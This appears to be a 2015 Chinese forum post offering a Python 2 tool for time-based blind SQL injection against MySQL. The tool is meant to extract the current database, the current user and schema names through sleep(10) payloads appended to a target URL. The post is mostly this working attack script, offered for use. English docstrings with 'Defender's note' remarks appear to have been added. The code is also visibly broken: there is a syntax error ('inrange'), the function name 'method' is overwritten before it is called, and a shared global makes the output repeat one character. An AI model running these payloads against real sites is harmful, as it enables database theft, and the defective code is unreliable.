基于时间延迟注入的mysql工具
本帖最后由 xiaoye 于 2015-9-30 10:55 编辑
理论链接:
http://open.freebuf.com/inland/574.html
如有不懂,请参考上述链接
一个基本可用的工具,当前仅支持 MySQL,可以读取数据库名、当前用户以及当前库,其他功能还在实现中。
#coding:utf8
#author:i3esn0w
import urllib2
import time
import threading
import urllib
from optparse import OptionParser
# Module-level "mailboxes" written by the worker threads below and read by
# get() / getdbname() after join().  Each thread rebinds the name to a single
# character (chr(...)); nothing appends to them, so at read time they hold
# only the value written most recently.
result={}
database={}
class data_therad(threading.Thread):
    """Worker that recovers one character of an SQL expression's value by bit-wise timing inference.

    Eight requests are sent for the character at 1-based position ``length``;
    request ``bit`` appends a fragment that makes the server ``sleep(10)`` when
    that bit is 0.  With ``timeout=3`` on the client side, a timeout -- or any
    other exception, including an HTTP error response -- is recorded as 0 and
    a normal response as 1.  The eight bits are turned into a character and
    stored in the module-level ``result``.

    Defender's note: each character costs eight near-identical requests whose
    URL carries ``sleep(10)`` and ``lpad(bin(ord(mid(`` in URL-encoded form, so
    the traffic is easy to match in access logs or a WAF.  Because every
    exception is read as a 0 bit, an endpoint that answers errors quickly (or
    is blocked) yields corrupted characters rather than data.  Parameterised
    queries remove the injection point this relies on.
    """
    #----------------------------------------------------------------------
    def __init__(self,url,length,sql):
        """Store the base URL, the 1-based character position and the inner SQL text."""
        threading.Thread.__init__(self)
        self.length=length
        self.url=url
        self.sql=sql
    #----------------------------------------------------------------------
    def run(self):
        """Issue the eight per-bit requests and rebind global ``result`` to chr(bits)."""
        data=""
        global result
        for bit in range(1,9):
            try:
                # Injected fragment: sleep(10) when bit ``bit`` of character ``length`` is 0.
                payload=' and if(mid(lpad(bin(ord(mid(('+self.sql+'),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(str(self.length),str(bit))
                target=self.url+urllib.quote(payload)
                # timeout=3 < sleep(10): a delayed answer surfaces here as an exception.
                req=urllib2.urlopen(target,timeout=3)
                html=req.read()           # body is read but never inspected
                data+=str(1)
            except Exception,e:
                # Any failure (timeout, HTTP error, network error) counts as a 0 bit.
                data+=str(0)
                pass
        # Rebinds the module global to this thread's character; nothing accumulates across threads.
        result=chr(int(data,2))
class db_name(threading.Thread):
    """Worker that recovers one character of a schema name from information_schema.schemata.

    Same eight-requests-per-character timing scheme as data_therad, but the
    inner query is fixed: ``SELECT SCHEMA_NAME FROM information_schema.schemata
    limit <db_num>,1``.  The decoded character is stored in the module-level
    ``database``.

    Defender's note: the literal ``information_schema.schemata`` together with
    ``sleep(10)`` in a URL-encoded query string is a strong signature for this
    activity; a database account without SELECT on information_schema, and
    parameterised queries in the application, both blunt it.
    """
    #----------------------------------------------------------------------
    def __init__(self,url,length,db_num):
        """Store the base URL, the 1-based character position (kept as ``lenth``) and the schema index."""
        threading.Thread.__init__(self)
        self.url=url
        self.lenth=length
        self.db_num=db_num
        # print self.lenth
    #----------------------------------------------------------------------
    def run(self):
        """Issue the eight per-bit requests and rebind global ``database`` to chr(bits)."""
        data=""
        global database
        for bit inrange(1,9):
            try:
                # Injected fragment: sleep(10) when bit ``bit`` of character ``lenth`` is 0.
                payload=' and if(mid(lpad(bin(ord(mid((SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(self.db_num,self.lenth,bit)
                target=self.url+urllib.quote(payload)
                # timeout=3 < sleep(10): a delayed answer surfaces here as an exception.
                req=urllib2.urlopen(target,timeout=3)
                html=req.read()           # body is read but never inspected
                data+=str(1)
            except Exception,e:
                # Any failure (timeout, HTTP error, network error) counts as a 0 bit.
                data+=str(0)
                pass
        # Rebinds the module global to this thread's character; nothing accumulates across threads.
        database=chr(int(data,2))
def getLenth(url,sql):
    """Return the length of the value of ``sql`` as inferred from response timing.

    One request per candidate length ``i`` (0, 1, 2, ...).  The injected
    fragment sleeps 10 s only when ``length((sql)) = i``; with ``timeout=3``
    that delay raises, and the current ``i`` is returned.  The loop also stops
    at the first exception of any other kind (network error, HTTP error
    response), so in that case the returned count is not a length at all.

    Defender's note: this probe is a run of requests from one client that
    differ only in a trailing integer, terminated by a single slow request --
    a pattern worth alerting on in access logs.
    """
    i=0
    # print "[*]Fetching data length"
    while True:
        try:
            payload=' and sleep(if(length(('+sql+'))=%s,10,0))'%str(i)
            target=url+urllib.quote(payload)
            req=urllib2.urlopen(target,timeout=3)
            result=req.read()      # local name; does not touch the module-level ``result``
            i=i+1
        except Exception,e:
            # print "[*]Data length: "+str(i)
            return i
def get(url,length,method):
    """Recover ``length`` characters of the SQL expression ``method`` and print them.

    Creates one data_therad per character position, then starts and joins
    each thread in turn, so the requests are issued sequentially despite the
    threading.  The printed value is the module-level ``result`` concatenated
    ``length`` times after the last join.
    """
    global result
    tmp=""
    print "[*]正在获取数据内容"
    threads=[]
    for len1 in range(1,length+1):
        sb=data_therad(url,len1,method)
        sb.setDaemon(True)
        threads.append(sb)
    for thread in threads:
        thread.start()
        thread.join()          # joined immediately: only one worker runs at a time
    for i in range(1,length+1):
        tmp+=result            # ``result`` is whatever the most recent worker wrote
    print "[*]数据内容为:"+tmp
def method(url,meth):
    """Dispatch on ``meth``: ``current-db``, ``current-user`` or ``dbs``.

    ``current-db`` and ``current-user`` pick a fixed SQL expression and hand it
    to getLenth()/get().  ``dbs`` first counts schemata with getdbs_num(), then
    recovers each schema name with getLenth()/getdbname() and prints it.  A
    ``meth`` value matching none of the three branches does nothing.
    """
    if meth=="current-db":
        sql="select database()"
        length=getLenth(url, sql)
        get(url, length, sql)
    if meth=="current-user":
        sql="select user()"
        length=getLenth(url, sql)
        get(url, length, sql)
    if meth=="dbs":
        print "[*]正在获取数据库个数"
        num=getdbs_num(url)
        print "[*]数据库个数为:%s"%num
        print "[*]正在获取所有数据库名"
        for number in range(1,num+1):
            # ``number`` is used directly as the LIMIT offset for this schema.
            sql="SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1"%number
            length=getLenth(url, sql)
            db=getdbname(url,length,number)
            print "[*]"+db
def getdbname(url,length,number):
    """Return the ``length``-character schema name at LIMIT offset ``number``.

    Mirrors get(): one db_name worker per character position, each started
    and joined immediately, then the module-level ``database`` concatenated
    ``length`` times is returned to the caller.
    """
    global database
    tmp=""
    # print "[*]Fetching database #%s"%number
    threads=[]
    for len in range(1,length+1):      # NOTE: ``len`` shadows the builtin inside this function
        sb=db_name(url, len, number)
        sb.setDaemon(True)
        threads.append(sb)
    for thread in threads:
        thread.start()
        thread.join()          # joined immediately: only one worker runs at a time
    for i in range(1,length+1):
        tmp+=database          # ``database`` is whatever the most recent worker wrote
    return tmp
def getdbs_num(url):
    """Return the number of rows in information_schema.schemata as inferred from response timing.

    Same scheme as getLenth(): one request per candidate count ``i``, with a
    10 s server-side sleep only when ``count(*) = i``; the first exception of
    any kind (timeout, network error, HTTP error response) ends the search and
    the current ``i`` is returned.
    """
    i=0
    # print "[*]Fetching database count"
    while True:
        try:
            payload=' and sleep(if((SELECT count(*) FROM information_schema.schemata)=%s,10,0))'%str(i)
            target=url+urllib.quote(payload)
            req=urllib2.urlopen(target,timeout=3)
            result=req.read()      # local name; does not touch the module-level ``result``
            i=i+1
        except Exception,e:
            # print "[*]Database count: "+str(i)
            return i
if __name__=='__main__':
    # Command line: -t/--target is the base URL (the encoded payload is appended
    # to it verbatim, so it must already end in the injectable parameter);
    # -m/--method selects one of the branches in method() (default current-user).
    parser=OptionParser()
    parser.add_option("-t","--target",dest="target_url",default="",help="The target url")
    parser.add_option("-m","--method",dest="method",default="current-user")
    (options,args)=parser.parse_args()
    url=options.target_url
    method=options.method      # rebinds the module-level name ``method`` to the option string
    start_time=time.time()
    method(url,method)
    end_time=time.time()
    # Wall-clock total; with sleep(10) per 0 bit this is dominated by server-side delays.
    print "[*]总共耗时:%s s"%int((end_time-start_time))